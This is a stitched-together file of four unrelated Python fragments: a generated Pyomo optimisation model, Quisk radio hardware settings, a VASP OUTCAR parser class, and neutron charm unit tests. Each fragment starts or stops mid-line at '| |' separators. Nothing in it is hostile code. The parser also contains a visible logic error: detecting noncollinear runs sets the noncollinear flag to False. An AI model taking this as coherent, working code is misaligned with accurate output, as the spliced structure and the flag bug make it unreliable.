m.c1491 = Constraint(expr= m.x989 + 13.5*m.b1051 <= 13.5)
m.c1492 = Constraint(expr= - 0.6*m.x970 + m.x990 == 0)
m.c1493 = Constraint(expr= - 0.6*m.x971 + m.x991 == 0)
m.c1494 = Constraint(expr= m.x972 == 0)
m.c1495 = Constraint(expr= m.x973 == 0)
m.c1496 = Constraint(expr= m.x992 == 0)
m.c1497 = Constraint(expr= m.x993 == 0)
m.c1498 = Constraint(expr= m.x724 - m.x970 - m.x972 == 0)
m.c1499 = Constraint(expr= m.x725 - m.x971 - m.x973 == 0)
m.c1500 = Constraint(expr= m.x736 - m.x990 - m.x992 == 0)
m.c1501 = Constraint(expr= m.x737 - m.x991 - m.x993 == 0)
m.c1502 = Constraint(expr= m.x970 - 15*m.b1052 <= 0)
m.c1503 = Constraint(expr= m.x971 - 15*m.b1053 <= 0)
m.c1504 = Constraint(expr= m.x972 + 15*m.b1052 <= 15)
m.c1505 = Constraint(expr= m.x973 + 15*m.b1053 <= 15)
m.c1506 = Constraint(expr= m.x990 - 9*m.b1052 <= 0)
m.c1507 = Constraint(expr= m.x991 - 9*m.b1053 <= 0)
m.c1508 = Constraint(expr= m.x992 + 9*m.b1052 <= 9)
m.c1509 = Constraint(expr= m.x993 + 9*m.b1053 <= 9)
m.c1510 = Constraint(expr= 5*m.b1054 + m.x1114 == 0)
m.c1511 = Constraint(expr= 4*m.b1055 + m.x1115 == 0)
m.c1512 = Constraint(expr= 8*m.b1056 + m.x1116 == 0)
m.c1513 = Constraint(expr= 7*m.b1057 + m.x1117 == 0)
m.c1514 = Constraint(expr= 6*m.b1058 + m.x1118 == 0)
m.c1515 = Constraint(expr= 9*m.b1059 + m.x1119 == 0)
# Generated linking constraints: each row ties a continuous variable to its
# paired binary as  coef*m.bN + m.xM == 0, i.e. m.xM = -coef * m.bN, so the
# x-variable takes the value -coef exactly when its binary is switched on.
# (Machine-generated model file; coefficients come from the instance data.)
m.c1516 = Constraint(expr= 10*m.b1060 + m.x1120 == 0)
m.c1517 = Constraint(expr= 9*m.b1061 + m.x1121 == 0)
m.c1518 = Constraint(expr= 6*m.b1062 + m.x1122 == 0)
m.c1519 = Constraint(expr= 10*m.b1063 + m.x1123 == 0)
m.c1520 = Constraint(expr= 7*m.b1064 + m.x1124 == 0)
m.c1521 = Constraint(expr= 7*m.b1065 + m.x1125 == 0)
m.c1522 = Constraint(expr= 4*m.b1066 + m.x1126 == 0)
m.c1523 = Constraint(expr= 3*m.b1067 + m.x1127 == 0)
m.c1524 = Constraint(expr= 5*m.b1068 + m.x1128 == 0)
m.c1525 = Constraint(expr= 6*m.b1069 + m.x1129 == 0)
m.c1526 = Constraint(expr= 2*m.b1070 + m.x1130 == 0)
m.c1527 = Constraint(expr= 5*m.b1071 + m.x1131 == 0)
m.c1528 = Constraint(expr= 4*m.b1072 + m.x1132 == 0)
m.c1529 = Constraint(expr= 7*m.b1073 + m.x1133 == 0)
m.c1530 = Constraint(expr= 3*m.b1074 + m.x1134 == 0)
m.c1531 = Constraint(expr= 9*m.b1075 + m.x1135 == 0)
m.c1532 = Constraint(expr= 7*m.b1076 + m.x1136 == 0)
m.c1533 = Constraint(expr= 2*m.b1077 + m.x1137 == 0)
m.c1534 = Constraint(expr= 3*m.b1078 + m.x1138 == 0)
m.c1535 = Constraint(expr= m.b1079 + m.x1139 == 0)
m.c1536 = Constraint(expr= 2*m.b1080 + m.x1140 == 0)
m.c1537 = Constraint(expr= 6*m.b1081 + m.x1141 == 0)
m.c1538 = Constraint(expr= 4*m.b1082 + m.x1142 == 0)
m.c1539 = Constraint(expr= 8*m.b1083 + m.x1143 == 0)
m.c1540 = Constraint(expr= 2*m.b1084 + m.x1144 == 0)
m.c1541 = Constraint(expr= 5*m.b1085 + m.x1145 == 0)
m.c1542 = Constraint(expr= 3*m.b1086 + m.x1146 == 0)
m.c1543 = Constraint(expr= 4*m.b1087 + m.x1147 == 0)
m.c1544 = Constraint(expr= 5*m.b1088 + m.x1148 == 0)
m.c1545 = Constraint(expr= 7*m.b1089 + m.x1149 == 0)
m.c1546 = Constraint(expr= 2*m.b1090 + m.x1150 == 0)
m.c1547 = Constraint(expr= 8*m.b1091 + m.x1151 == 0)
m.c1548 = Constraint(expr= m.b1092 + m.x1152 == 0)
m.c1549 = Constraint(expr= 4*m.b1093 + m.x1153 == 0)
m.c1550 = Constraint(expr= 2*m.b1094 + m.x1154 == 0)
m.c1551 = Constraint(expr= 5*m.b1095 + m.x1155 == 0)
m.c1552 = Constraint(expr= 9*m.b1096 + m.x1156 == 0)
m.c1553 = Constraint(expr= 2*m.b1097 + m.x1157 == 0)
m.c1554 = Constraint(expr= 5*m.b1098 + m.x1158 == 0)
m.c1555 = Constraint(expr= 8*m.b1099 + m.x1159 == 0)
m.c1556 = Constraint(expr= 2*m.b1100 + m.x1160 == 0)
m.c1557 = Constraint(expr= 3*m.b1101 + m.x1161 == 0)
m.c1558 = Constraint(expr= 10*m.b1102 + m.x1162 == 0)
m.c1559 = Constraint(expr= 6*m.b1103 + m.x1163 == 0)
m.c1560 = Constraint(expr= 4*m.b1104 + m.x1164 == 0)
m.c1561 = Constraint(expr= 8*m.b1105 + m.x1165 == 0)
m.c1562 = Constraint(expr= 7*m.b1106 + m.x1166 == 0)
m.c1563 = Constraint(expr= 3*m.b1107 + m.x1167 == 0)
m.c1564 = Constraint(expr= 4*m.b1108 + m.x1168 == 0)
m.c1565 = Constraint(expr= 8*m.b1109 + m.x1169 == 0)
m.c1566 = Constraint(expr= 2*m.b1110 + m.x1170 == 0)
m.c1567 = Constraint(expr= m.b1111 + m.x1171 == 0)
m.c1568 = Constraint(expr= 8*m.b1112 + m.x1172 == 0)
m.c1569 = Constraint(expr= 3*m.b1113 + m.x1173 == 0)
# Implication constraints on consecutive binary pairs:  m.bX - m.bY <= 0
# means bX <= bY, i.e. bX can only be 1 if bY is also 1 (for 0/1 binaries).
m.c1570 = Constraint(expr= m.b994 - m.b995 <= 0)
m.c1571 = Constraint(expr= m.b996 - m.b997 <= 0)
m.c1572 = Constraint(expr= m.b998 - m.b999 <= 0)
m.c1573 = Constraint(expr= m.b1000 - m.b1001 <= 0)
m.c1574 = Constraint(expr= m.b1002 - m.b1003 <= 0)
m.c1575 = Constraint(expr= m.b1004 - m.b1005 <= 0)
m.c1576 = Constraint(expr= m.b1006 - m.b1007 <= 0)
m.c1577 = Constraint(expr= m.b1008 - m.b1009 <= 0)
m.c1578 = Constraint(expr= m.b1010 - m.b1011 <= 0)
m.c1579 = Constraint(expr= m.b1012 - m.b1013 <= 0)
m.c1580 = Constraint(expr= m.b1014 - m.b1015 <= 0)
m.c1581 = Constraint(expr= m.b1016 - m.b1017 <= 0)
m.c1582 = Constraint(expr= m.b1018 - m.b1019 <= 0)
m.c1583 = Constraint(expr= m.b1020 - m.b1021 <= 0)
m.c1584 = Constraint(expr= m.b1022 - m.b1023 <= 0)
m.c1585 = Constraint(expr= m.b1024 - m.b1025 <= 0)
m.c1586 = Constraint(expr= m.b1026 - m.b1027 <= 0)
m.c1587 = Constraint(expr= m.b1028 - m.b1029 <= 0)
m.c1588 = Constraint(expr= m.b1030 - m.b1031 <= 0)
m.c1589 = Constraint(expr= m.b1032 - m.b1033 <= 0)
m.c1590 = Constraint(expr= m.b1034 - m.b1035 <= 0)
m.c1591 = Constraint(expr= m.b1036 - m.b1037 <= 0)
m.c1592 = Constraint(expr= m.b1038 - m.b1039 <= 0)
m.c1593 = Constraint(expr= m.b1040 - m.b1041 <= 0)
m.c1594 = Constraint(expr= m.b1042 - m.b1043 <= 0)
m.c1595 = Constraint(expr= m.b1044 - m.b1045 <= 0)
m.c1596 = Constraint(expr= m.b1046 - m.b1047 <= 0)
m.c1597 = Constraint(expr= m.b1048 - m.b1049 <= 0)
m.c1598 = Constraint(expr= m.b1050 - m.b1051 <= 0)
m.c1599 = Constraint(expr= m.b1052 - m.b1053 <= 0)
# Mutual-exclusion constraints:  bX + bY <= 1  forbids both binaries in a
# pair from being 1 simultaneously.
# NOTE(review): each pair appears twice (e.g. c1600 and c1601 are identical).
# Presumably an artifact of the model generator; redundant but harmless.
m.c1600 = Constraint(expr= m.b1054 + m.b1055 <= 1)
m.c1601 = Constraint(expr= m.b1054 + m.b1055 <= 1)
m.c1602 = Constraint(expr= m.b1056 + m.b1057 <= 1)
m.c1603 = Constraint(expr= m.b1056 + m.b1057 <= 1)
m.c1604 = Constraint(expr= m.b1058 + m.b1059 <= 1)
m.c1605 = Constraint(expr= m.b1058 + m.b1059 <= 1)
m.c1606 = Constraint(expr= m.b1060 + m.b1061 <= 1)
m.c1607 = Constraint(expr= m.b1060 + m.b1061 <= 1)
m.c1608 = Constraint(expr= m.b1062 + m.b1063 <= 1)
m.c1609 = Constraint(expr= m.b1062 + m.b1063 <= 1)
m.c1610 = Constraint(expr= m.b1064 + m.b1065 <= 1)
m.c1611 = Constraint(expr= m.b1064 + m.b1065 <= 1)
m.c1612 = Constraint(expr= m.b1066 + m.b1067 <= 1)
m.c1613 = Constraint(expr= m.b1066 + m.b1067 <= 1)
m.c1614 = Constraint(expr= m.b1068 + m.b1069 <= 1)
m.c1615 = Constraint(expr= m.b1068 + m.b1069 <= 1)
m.c1616 = Constraint(expr= m.b1070 + m.b1071 <= 1)
m.c1617 = Constraint(expr= m.b1070 + m.b1071 <= 1)
m.c1618 = Constraint(expr= m.b1072 + m.b1073 <= 1)
m.c1619 = Constraint(expr= m.b1072 + m.b1073 <= 1)
m.c1620 = Constraint(expr= m.b1074 + m.b1075 <= 1)
m.c1621 | |
slider.
# --- HiQSDR radio settings -------------------------------------------------
# Quisk config section: plain module-level assignments read by Quisk at
# startup.  The "## name label, type" comments are Quisk's own metadata
# format for its settings GUI — do not reformat them.
digital_tx_level = 20
## HiQSDR_BandDict IO Bus, dict
# This sets the preselect (4 bits) on the X1 connector.
HiQSDR_BandDict = {
    '160':1, '80':2, '40':3, '30':4, '20':5, '15':6, '17':7,
    '12':8, '10':9, '6':10, '500k':11, '137k':12 }
## cw_delay CW Delay, integer
# This is the delay for CW from 0 to 255.
cw_delay = 0
## rx_udp_ip IP address, text
# This is the IP address of your hardware.
# For FPGA firmware version 1.4 and newer, and if enabled, the hardware is set to the IP address you enter here.
# For older firmware, the IP address is programmed into the FPGA, and you must enter that address.
rx_udp_ip = "192.168.2.160"
#rx_udp_ip = "192.168.1.196"
## rx_udp_port Hardware UDP port, integer
# This is the UDP port number of your hardware.
rx_udp_port = 48247
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
rx_udp_ip_netmask = '255.255.255.0'
## tx_ip Transmit IP, text
# Leave this blank to use the same IP address as the receive hardware. Otherwise, enter "disable"
# to disable sending transmit I/Q samples, or enter the actual IP address. You must enter "disable"
# if you have multiple hardwares on the network, and only one should transmit.
tx_ip = ""
#tx_ip = "disable"
#tx_ip = "192.168.1.201"
## tx_audio_port Tx audio UDP port, integer
# This is the UDP port for transmit audio I/Q samples. Enter zero to calculate this from the
# base hardware port. Otherwise enter the special custom port.
tx_audio_port = 0
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz.
rx_udp_clock = 122880000
## sndp_active Enable setting IP, boolean
# If possible, set the IP address to the address entered.
# For FPGA firmware version 1.4 and newer, the hardware is set to the IP address you enter here.
# For older firmware, the IP address is programmed into the FPGA, and you must enter that address.
sndp_active = True
#sndp_active = False
## radio_sound_ip IP sound play, text
# This option sends radio playback sound to a UDP device. Some SDR hardware devices have an
# audio codec that can play radio sound with less latency than a soundcard. The sample rate
# is the same as the soundcard sample rate, but probably you will want 48000 sps. The UDP
# data consists of two bytes of zero, followed by the specified number of samples. Each
# sample consists of two bytes (a short) of I data and two bytes of Q data in little-endian order.
# For radio_sound_nsamples = 360, the total number of UDP data bytes is 1442.
#radio_sound_ip = "192.168.2.160"
## radio_sound_port UDP port play, integer
# The UDP port of the radio sound play device.
#radio_sound_port = 48250
## radio_sound_nsamples Num play samples, integer
# The number of play samples per UDP block.
#radio_sound_nsamples = 360
## radio_sound_mic_ip IP microphone, text
# This option receives microphone samples from a UDP device. The UDP
# data consists of two bytes of zero, followed by the specified number of samples. Each
# sample consists of two bytes (a short) of monophonic microphone data in little-endian order.
# For radio_sound_mic_nsamples = 720, the total number of UDP data bytes is 1442.
#radio_sound_mic_ip = "192.168.2.160"
## radio_sound_mic_port UDP port mic, integer
# The UDP port of the microphone device.
#radio_sound_mic_port = 48251
## radio_sound_mic_nsamples Num mic samples, integer
# The number of mic samples per UDP block.
#radio_sound_mic_nsamples = 720
## radio_sound_mic_boost Mic boost, boolean
# Use False for no microphone boost, or True for +20 dB boost.
#radio_sound_mic_boost = False
#radio_sound_mic_boost = True
################ Receivers Odyssey2, The Odyssey-2 project using the HPSDR Hermes protocol
# --- Odyssey-2 / Hermes radio settings -------------------------------------
# NOTE(review): tx_ip and tx_audio_port are assigned again below with the
# same values as in the HiQSDR section above; the later assignment wins at
# import time.  Presumably intentional per-radio templating — verify before
# changing either section independently.
## hardware_file_name Hardware file path, rfile
# This is the file that contains the control logic for each radio.
#hardware_file_name = 'hermes/quisk_hardware.py'
## widgets_file_name Widget file path, rfile
# This optional file adds additional controls for the radio.
#widgets_file_name = 'hermes/quisk_widgets.py'
# Use the file hermes/quisk_conf.py as a model config file. The Hermes can obtain its IP address from
# DHCP. Set rx_udp_ip to the null string in this case. Or use rx_udp_ip to specify an IP address, but
# be sure it is unique and not in use by a DHCP server.
# You can set these options:
## use_rx_udp Hardware type, integer choice
# This is the type of UDP hardware. Use 10 for the Hermes protocol.
#use_rx_udp = 10
## rx_udp_ip IP change, text
# This item should be left blank. It is used to change the IP address of the hardware to a different
# IP once the hardware is found. Not all Hermes firmware supports changing the IP address.
#rx_udp_ip = ""
## rx_udp_port Hardware UDP port, integer
# This is the UDP port number of your hardware.
#rx_udp_port = 1024
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
#rx_udp_ip_netmask = '255.255.255.0'
## tx_ip Transmit IP, text
# Leave this blank to use the same IP address as the receive hardware. Otherwise, enter "disable"
# to disable sending transmit I/Q samples, or enter the actual IP address. You must enter "disable"
# if you have multiple hardwares on the network, and only one should transmit. This item is normally blank.
tx_ip = ""
#tx_ip = "disable"
## tx_audio_port Tx audio UDP port, integer
# This is the UDP port for transmit audio I/Q samples. Enter zero to calculate this from the
# base hardware port. Otherwise enter the special custom port.
tx_audio_port = 0
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz. For Odyssey use 122880000.
#rx_udp_clock = 122880000
## tx_level Tx Level, dict
# tx_level sets the transmit level 0 to 255 for each band. The None band is the default.
# The config screen has a slider 0 to 100% so you can reduce the transmit power. The sliders
# only appear if your hardware defines the method SetTxLevel(). The hardware only supports a
# limited adjustment range, so zero is still a small amount of power.
tx_level = {
    None:120, '60':110}
## digital_tx_level Digital Tx power %, integer
# Digital modes reduce power by the percentage on the config screen.
# This is the maximum value of the slider.
#digital_tx_level = 20
## hermes_code_version Hermes code version, integer
# There can be multiple Hermes devices on a network, but Quisk can only use one of these. If you have multiple
# Hermes devices, you can use this to specify a unique device. Or use -1 to accept any board.
hermes_code_version = -1
## hermes_board_id Hermes board ID, integer
# There can be multiple Hermes devices on a network, but Quisk can only use one of these. If you have multiple
# Hermes devices, you can use this to specify a unique device. Or use -1 to accept any board.
hermes_board_id = -1
## hermes_LNA_dB Initial LNA dB, integer
# The initial value for the low noise Rx amplifier gain in dB.
hermes_LNA_dB = 20
## Hermes_BandDict Hermes Bus, dict
# The Hermes_BandDict sets the 7 bits on the J16 connector.
Hermes_BandDict = {
    '160':0b0000001, '80':0b0000010, '60':0b0000100, '40':0b0001000, '30':0b0010000, '20':0b0100000, '15':0b1000000}
## Hermes_BandDictTx Tx IO Bus, dict
# The Hermes_BandDictTx sets the 7 bits on the J16 connector for Tx if enabled.
Hermes_BandDictTx = {'160':0, '80':0, '60':0, '40':0, '30':0, '20':0, '17':0, '15':0, '12':0, '10':0}
## Hermes_BandDictEnTx Enable Tx Filt, boolean
# Enable the separate Rx and Tx settings for the J16 connector.
Hermes_BandDictEnTx = False
#Hermes_BandDictEnTx = True
## AlexHPF Alex High Pass Filters, list
# This is a list of frequencies and high pass filter settings.
AlexHPF = [
    ['3.0', '4.5', 0, 0], ['6.5', '8.5', 0, 0]] + [['', '', 0, 0]] * 6
## AlexLPF Alex Low Pass Filters, list
# This is a list of frequencies and low pass filter settings.
AlexLPF = [
    ['3.0', '4.5', 0, 0], ['6.5', '8.5', 0, 0]] + [['', '', 0, 0]] * 6
## AlexHPF_TxEn Alex HPF Tx Enable, boolean
AlexHPF_TxEn = False
#AlexHPF_TxEn = True
## AlexLPF_TxEn Alex LPF Tx Enable, boolean
AlexLPF_TxEn = False
#AlexLPF_TxEn = True
################ Receivers Afedri, The Afedri SDR receiver with the Ethernet interface.
# --- Afedri radio settings (all defaults commented out) --------------------
## hardware_file_name Hardware file path, rfile
# This is the file that contains the control logic for each radio.
#hardware_file_name = 'afedrinet/quisk_hardware.py'
## widgets_file_name Widget file path, rfile
# This optional file adds additional controls for the radio.
#widgets_file_name = ''
## rx_udp_ip IP address, text
# This is the IP address of your hardware. Enter 0.0.0.0 to search for the address.
#rx_udp_ip = "0.0.0.0"
#rx_udp_ip = "192.168.0.200"
#rx_udp_ip = "192.168.1.196"
## rx_udp_port Hardware UDP port, integer
# This is the base UDP port number of your hardware.
#rx_udp_port = 50000
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
#rx_udp_ip_netmask = '255.255.255.0'
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz.
#rx_udp_clock = 80000000
## default_rf_gain Default RF | |
electrostatic_potential
Average electrostatic potential at each atomic position in order
of the atoms in POSCAR.
..attribute: final_energy_contribs
Individual contributions to the total final energy as a dictionary.
    Includes contributions from keys, e.g.:
{'DENC': -505778.5184347, 'EATOM': 15561.06492564, 'EBANDS': -804.53201231,
'EENTRO': -0.08932659, 'EXHF': 0.0, 'Ediel_sol': 0.0,
'PAW double counting': 664.6726974100002, 'PSCENC': 742.48691646,
'TEWEN': 489742.86847338, 'XCENC': -169.64189814}
.. attribute:: efermi
Fermi energy
.. attribute:: filename
Filename
.. attribute:: final_energy
Final (total) energy
.. attribute:: has_onsite_density_matrices
Boolean for if onsite density matrices have been set
.. attribute:: lcalcpol
If LCALCPOL has been set
.. attribute:: lepsilon
If LEPSILON has been set
.. attribute:: nelect
Returns the number of electrons in the calculation
.. attribute:: spin
If spin-polarization was enabled via ISPIN
.. attribute:: total_mag
Total magnetization (in terms of the number of unpaired electrons)
One can then call a specific reader depending on the type of run being
performed. These are currently: read_igpar(), read_lepsilon() and
    read_lcalcpol(), read_core_state_eigen(), read_avg_core_pot().
See the documentation of those methods for more documentation.
Authors: <NAME>, <NAME>
"""
def __init__(self, filename):
"""
Args:
filename (str): OUTCAR filename to parse.
"""
self.filename = filename
self.is_stopped = False
# data from end of OUTCAR
charge = []
mag_x = []
mag_y = []
mag_z = []
header = []
run_stats = {}
total_mag = None
nelect = None
efermi = None
total_energy = None
time_patt = re.compile(r"\((sec|kb)\)")
efermi_patt = re.compile(r"E-fermi\s*:\s*(\S+)")
nelect_patt = re.compile(r"number of electron\s+(\S+)\s+magnetization")
mag_patt = re.compile(r"number of electron\s+\S+\s+magnetization\s+(" r"\S+)")
toten_pattern = re.compile(r"free energy TOTEN\s+=\s+([\d\-\.]+)")
all_lines = []
for line in reverse_readfile(self.filename):
clean = line.strip()
all_lines.append(clean)
if clean.find("soft stop encountered! aborting job") != -1:
self.is_stopped = True
else:
if time_patt.search(line):
tok = line.strip().split(":")
try:
# try-catch because VASP 6.2.0 may print
# Average memory used (kb): N/A
# which cannot be parsed as float
run_stats[tok[0].strip()] = float(tok[1].strip())
except ValueError:
run_stats[tok[0].strip()] = None
continue
m = efermi_patt.search(clean)
if m:
try:
# try-catch because VASP sometimes prints
# 'E-fermi: ******** XC(G=0): -6.1327
# alpha+bet : -1.8238'
efermi = float(m.group(1))
continue
except ValueError:
efermi = None
continue
m = nelect_patt.search(clean)
if m:
nelect = float(m.group(1))
m = mag_patt.search(clean)
if m:
total_mag = float(m.group(1))
if total_energy is None:
m = toten_pattern.search(clean)
if m:
total_energy = float(m.group(1))
if all([nelect, total_mag is not None, efermi is not None, run_stats]):
break
# For single atom systems, VASP doesn't print a total line, so
# reverse parsing is very difficult
read_charge = False
read_mag_x = False
read_mag_y = False # for SOC calculations only
read_mag_z = False
all_lines.reverse()
for clean in all_lines:
if read_charge or read_mag_x or read_mag_y or read_mag_z:
if clean.startswith("# of ion"):
header = re.split(r"\s{2,}", clean.strip())
header.pop(0)
else:
m = re.match(r"\s*(\d+)\s+(([\d\.\-]+)\s+)+", clean)
if m:
toks = [float(i) for i in re.findall(r"[\d\.\-]+", clean)]
toks.pop(0)
if read_charge:
charge.append(dict(zip(header, toks)))
elif read_mag_x:
mag_x.append(dict(zip(header, toks)))
elif read_mag_y:
mag_y.append(dict(zip(header, toks)))
elif read_mag_z:
mag_z.append(dict(zip(header, toks)))
elif clean.startswith("tot"):
read_charge = False
read_mag_x = False
read_mag_y = False
read_mag_z = False
if clean == "total charge":
charge = []
read_charge = True
read_mag_x, read_mag_y, read_mag_z = False, False, False
elif clean == "magnetization (x)":
mag_x = []
read_mag_x = True
read_charge, read_mag_y, read_mag_z = False, False, False
elif clean == "magnetization (y)":
mag_y = []
read_mag_y = True
read_charge, read_mag_x, read_mag_z = False, False, False
elif clean == "magnetization (z)":
mag_z = []
read_mag_z = True
read_charge, read_mag_x, read_mag_y = False, False, False
elif re.search("electrostatic", clean):
read_charge, read_mag_x, read_mag_y, read_mag_z = (
False,
False,
False,
False,
)
# merge x, y and z components of magmoms if present (SOC calculation)
if mag_y and mag_z:
# TODO: detect spin axis
mag = []
for idx in range(len(mag_x)):
mag.append(
{key: Magmom([mag_x[idx][key], mag_y[idx][key], mag_z[idx][key]]) for key in mag_x[0].keys()}
)
else:
mag = mag_x
# data from beginning of OUTCAR
run_stats["cores"] = 0
with zopen(filename, "rt") as f:
for line in f:
if "running" in line:
run_stats["cores"] = line.split()[2]
break
self.run_stats = run_stats
self.magnetization = tuple(mag)
self.charge = tuple(charge)
self.efermi = efermi
self.nelect = nelect
self.total_mag = total_mag
self.final_energy = total_energy
self.data = {}
# Read "total number of plane waves", NPLWV:
self.read_pattern(
{"nplwv": r"total plane-waves NPLWV =\s+(\*{6}|\d+)"},
terminate_on_match=True,
)
try:
self.data["nplwv"] = [[int(self.data["nplwv"][0][0])]]
except ValueError:
self.data["nplwv"] = [[None]]
nplwvs_at_kpoints = [
n
for [n] in self.read_table_pattern(
r"\n{3}-{104}\n{3}",
r".+plane waves:\s+(\*{6,}|\d+)",
r"maximum and minimum number of plane-waves",
)
]
self.data["nplwvs_at_kpoints"] = [None for n in nplwvs_at_kpoints]
for (n, nplwv) in enumerate(nplwvs_at_kpoints):
try:
self.data["nplwvs_at_kpoints"][n] = int(nplwv)
except ValueError:
pass
# Read the drift:
self.read_pattern(
{"drift": r"total drift:\s+([\.\-\d]+)\s+([\.\-\d]+)\s+([\.\-\d]+)"},
terminate_on_match=False,
postprocess=float,
)
self.drift = self.data.get("drift", [])
# Check if calculation is spin polarized
self.spin = False
self.read_pattern({"spin": "ISPIN = 2"})
if self.data.get("spin", []):
self.spin = True
# Check if calculation is noncollinear
self.noncollinear = False
self.read_pattern({"noncollinear": "LNONCOLLINEAR = T"})
if self.data.get("noncollinear", []):
self.noncollinear = False
# Check if the calculation type is DFPT
self.dfpt = False
self.read_pattern(
{"ibrion": r"IBRION =\s+([\-\d]+)"},
terminate_on_match=True,
postprocess=int,
)
if self.data.get("ibrion", [[0]])[0][0] > 6:
self.dfpt = True
self.read_internal_strain_tensor()
# Check to see if LEPSILON is true and read piezo data if so
self.lepsilon = False
self.read_pattern({"epsilon": "LEPSILON= T"})
if self.data.get("epsilon", []):
self.lepsilon = True
self.read_lepsilon()
# only read ionic contribution if DFPT is turned on
if self.dfpt:
self.read_lepsilon_ionic()
# Check to see if LCALCPOL is true and read polarization data if so
self.lcalcpol = False
self.read_pattern({"calcpol": "LCALCPOL = T"})
if self.data.get("calcpol", []):
self.lcalcpol = True
self.read_lcalcpol()
self.read_pseudo_zval()
# Read electrostatic potential
self.electrostatic_potential = None
self.ngf = None
self.sampling_radii = None
self.read_pattern({"electrostatic": r"average \(electrostatic\) potential at core"})
if self.data.get("electrostatic", []):
self.read_electrostatic_potential()
self.nmr_cs = False
self.read_pattern({"nmr_cs": r"LCHIMAG = (T)"})
if self.data.get("nmr_cs", None):
self.nmr_cs = True
self.read_chemical_shielding()
self.read_cs_g0_contribution()
self.read_cs_core_contribution()
self.read_cs_raw_symmetrized_tensors()
self.nmr_efg = False
self.read_pattern({"nmr_efg": r"NMR quadrupolar parameters"})
if self.data.get("nmr_efg", None):
self.nmr_efg = True
self.read_nmr_efg()
self.read_nmr_efg_tensor()
self.has_onsite_density_matrices = False
self.read_pattern(
{"has_onsite_density_matrices": r"onsite density matrix"},
terminate_on_match=True,
)
if "has_onsite_density_matrices" in self.data:
self.has_onsite_density_matrices = True
self.read_onsite_density_matrices()
# Store the individual contributions to the final total energy
final_energy_contribs = {}
for k in [
"PSCENC",
"TEWEN",
"DENC",
"EXHF",
"XCENC",
"PAW double counting",
"EENTRO",
"EBANDS",
"EATOM",
"Ediel_sol",
]:
if k == "PAW double counting":
self.read_pattern({k: r"%s\s+=\s+([\.\-\d]+)\s+([\.\-\d]+)" % (k)})
else:
self.read_pattern({k: r"%s\s+=\s+([\d\-\.]+)" % (k)})
if not self.data[k]:
continue
final_energy_contribs[k] = sum(float(f) for f in self.data[k][-1])
self.final_energy_contribs = final_energy_contribs
def read_pattern(self, patterns, reverse=False, terminate_on_match=False, postprocess=str):
r"""
General pattern reading. Uses monty's regrep method. Takes the same
arguments.
Args:
patterns (dict): A dict of patterns, e.g.,
{"energy": r"energy\\(sigma->0\\)\\s+=\\s+([\\d\\-.]+)"}.
reverse (bool): Read files in reverse. Defaults to false. Useful for
large files, esp OUTCARs, especially when used with
terminate_on_match.
terminate_on_match (bool): Whether to terminate when there is at
least one match in each key in pattern.
postprocess (callable): A post processing function to convert all
matches. Defaults to str, i.e., no change.
Renders accessible:
Any attribute in patterns. For example,
{"energy": r"energy\\(sigma->0\\)\\s+=\\s+([\\d\\-.]+)"} will set the
value of self.data["energy"] = [[-1234], [-3453], ...], to the
results from regex and postprocess. Note that the returned values
are lists of lists, because you can grep multiple items on one line.
"""
matches = regrep(
self.filename,
patterns,
reverse=reverse,
terminate_on_match=terminate_on_match,
postprocess=postprocess,
)
for k in patterns.keys():
self.data[k] = [i[0] for i in matches.get(k, [])]
def read_table_pattern(
self,
header_pattern,
row_pattern,
footer_pattern,
postprocess=str,
attribute_name=None,
last_one_only=True,
):
r"""
Parse table-like data. A table composes of three parts: header,
main body, footer. All the data matches "row pattern" in the main body
will be returned.
Args:
header_pattern (str): The regular expression pattern matches the
table header. This pattern should match all the text
immediately before the main body of the table. For multiple
sections table match the text until the section of
interest. MULTILINE and DOTALL options are enforced, as a
result, the "." meta-character will also match "\n" in this
section.
row_pattern (str): The regular expression matches a single line in
the table. Capture interested field using regular expression
groups.
footer_pattern (str): The regular expression matches the end of the
table. E.g. a long dash line.
postprocess (callable): A post | |
<gh_stars>0
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from mock import patch
import neutron_api_context as context
import charmhelpers
from test_utils import CharmTestCase
TO_PATCH = [
'config',
'determine_api_port',
'determine_apache_port',
'log',
'os_release',
'relation_get',
'relation_ids',
'related_units',
]
class GeneralTests(CharmTestCase):
    """Tests for the module-level helpers in neutron_api_context.

    Uses the deprecated-alias-free ``assertEqual`` (``assertEquals`` is a
    deprecated unittest alias) and portable ``str(exception)`` instead of
    the Python-2-only ``exception.message``.
    """

    def setUp(self):
        super(GeneralTests, self).setUp(context, TO_PATCH)
        self.relation_get.side_effect = self.test_relation.get
        self.config.side_effect = self.test_config.get

    def test_l2population(self):
        self.test_config.set('l2-population', True)
        self.test_config.set('neutron-plugin', 'ovs')
        self.assertEqual(context.get_l2population(), True)

    def test_l2population_nonovs(self):
        # l2-population is only honoured for the ovs plugin.
        self.test_config.set('l2-population', True)
        self.test_config.set('neutron-plugin', 'nsx')
        self.assertEqual(context.get_l2population(), False)

    def test_get_overlay_network_type(self):
        self.test_config.set('overlay-network-type', 'gre')
        self.assertEqual(context.get_overlay_network_type(), 'gre')

    def test_get_overlay_network_type_multi(self):
        # Space-separated config is normalised to a comma-separated list.
        self.test_config.set('overlay-network-type', 'gre vxlan')
        self.assertEqual(context.get_overlay_network_type(), 'gre,vxlan')

    def test_get_overlay_network_type_unsupported(self):
        self.test_config.set('overlay-network-type', 'tokenring')
        with self.assertRaises(ValueError) as _exceptctxt:
            context.get_overlay_network_type()
        # str(exc) works on both Python 2 and 3; exc.message is Py2-only.
        self.assertEqual(str(_exceptctxt.exception),
                         'Unsupported overlay-network-type tokenring')

    def test_get_l3ha(self):
        self.test_config.set('enable-l3ha', True)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', False)
        self.os_release.return_value = 'juno'
